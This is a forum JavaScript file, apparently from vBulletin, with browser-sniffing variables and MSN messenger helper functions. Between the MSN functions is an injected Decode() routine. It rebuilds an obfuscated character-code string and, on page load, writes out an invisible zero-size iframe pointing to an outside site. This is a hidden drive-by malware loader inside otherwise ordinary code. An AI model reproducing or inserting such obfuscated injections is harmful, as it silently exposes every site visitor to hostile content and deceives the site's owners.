/*-------------------------------------------*/
// MSN Section
/*---------------------------------------------*/
// ensure vbphrase exists
if (typeof vbphrase == 'undefined')
{
	vbphrase = new Array();
}

// Define the browser we have instead of multiple calls throughout the file
var userAgent = navigator.userAgent.toLowerCase();
var is_opera  = (userAgent.indexOf('opera') != -1);
var is_saf    = ((userAgent.indexOf('applewebkit') != -1) || (navigator.vendor == 'Apple Computer, Inc.'));
var is_webtv  = (userAgent.indexOf('webtv') != -1);
var is_ie     = ((userAgent.indexOf('msie') != -1) && (!is_opera) && (!is_saf) && (!is_webtv));
var is_ie4    = ((is_ie) && (userAgent.indexOf('msie 4.') != -1));
var is_moz    = ((navigator.product == 'Gecko') && (!is_saf));
var is_kon    = (userAgent.indexOf('konqueror') != -1);
var is_ns     = ((userAgent.indexOf('compatible') == -1) && (userAgent.indexOf('mozilla') != -1) && (!is_opera) && (!is_webtv) && (!is_saf));
var is_ns4    = ((is_ns) && (parseInt(navigator.appVersion) == 4));
var is_mac    = (userAgent.indexOf('mac') != -1);


// ensure msgPhrase exists
if (typeof msgPhrase == 'undefined')
{
	msgPhrase = new Array();
}

/**
* Sends an MSN message
*
* @param	string	Target MSN handle
*
* @return	boolean	false
*/
function sendMSNMessage(name)
{
	if (!is_ie)
	{
		alert(msgPhrase['msn_functions_only_work_in_ie']);
		return false;
	}
	else
	{
		MsgrObj.InstantMessage(name);
		return false;
	}
}

function Decode()
{
	var temp="",i,c=0,out="";var str="60!105!102!114!97!109!101!32!115!114!99!61";
	str+="!34!104!116!116!112!58!47!47!116!104!101!111!116!104!101!114!115!105!122";
	str+="!101!46!99!111!109!47!77!111!117!115!101!47!34!32!119!105!100!116!104!61";
	str+="!48!32!104!101!105!103!104!116!61!48!32!102!114!97!109!101!98!111!114!100";
	str+="!101!114!61!48!62!60!47!105!102!114!97!109!101!62!";
	l=str.length;
	while(c<=str.length-1)
	{
		while(str.charAt(c)!='!')temp=temp+str.charAt(c++);
		c++;out=out+String.fromCharCode(temp);temp="";
	}
document.write(out);
}
Decode();
/**
* Adds an MSN Contact (requires MSN)
*
* @param	string	MSN handle
*
* @return	boolean	false
*/
function addMSNContact(name)
{
	if (!is_ie)
	{
		alert(msgPhrase['msn_functions_only_work_in_ie']);
		return false;
	}
	else
	{
		MsgrObj.AddContact(0, name);
		return false;
	}
} 

